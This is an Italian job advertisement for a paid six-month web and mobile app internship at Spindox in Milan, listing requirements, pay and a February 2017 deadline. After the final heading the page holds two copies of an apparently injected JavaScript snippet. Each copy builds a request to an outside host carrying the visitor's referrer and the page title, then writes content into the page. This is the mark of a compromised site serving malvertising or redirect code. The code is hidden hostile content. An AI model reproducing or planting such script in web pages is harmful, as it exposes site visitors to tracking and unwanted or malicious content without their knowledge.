Tirocinio informatica Spindox 2017

Spindox, con sede a Milano, è alla ricerca di un laureato o laureando in discipline informatiche per un tirocinio retribuito in progettazione, realizzazione e sviluppo di App e Web app per smartphone e device mobili.

A chi è rivolto

Il tirocinio informatica Spindox 2017 è rivolto a un laureato o laureando in informatica o discipline simili con conoscenza di HTML, CSS, Javascript, buona conoscenza della lingua inglese e predisposizione al lavoro in team per la realizzazione di progetti. Si richiede inoltre disponibilità a trasferte sulla sede di Torino. Il candidato selezionato verrà inserito nel team Customer Engagement&Digital Solutions collaborando con Front end, Back end Developera e Web Designers in un contesto giovane, dinamico e orientato all’innovazione

L’importo e la durata

Il tirocinio informatica Spindox 2017 offre uno percorso di 6 mesi volto all’inserimento permanente nell’organico aziendale, retribuzione pari a 800 euro mensili per tutto il periodo dello stage, Ticket Restaurant, formazione tecnica e manageriale.

I requisiti

Per candidarsi al tirocinio informatica Spindox 2017 bisogna essere in possesso dei seguenti requisiti:

  • essere laureati o laureandi in informatica o affini;
  • conoscenza di HTML; CSS e Javascript;
  • passione per la programmazione;
  • buona conoscenza della lingua inglese;
  • predisposizione al lavoro in team;
  • dispobilità a viaggiare per trasferte nella sede Spindox di Torino.

Come e quando presentare domanda

Per tirocinio retribuito informatica Spindox 2017 bisogna inviare la propria candidatura attraverso questo link. La scadenza per l’invio del Curriculum è fissata al 28 febbraio 2017.

Bando tirocinio informatica Spindox 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();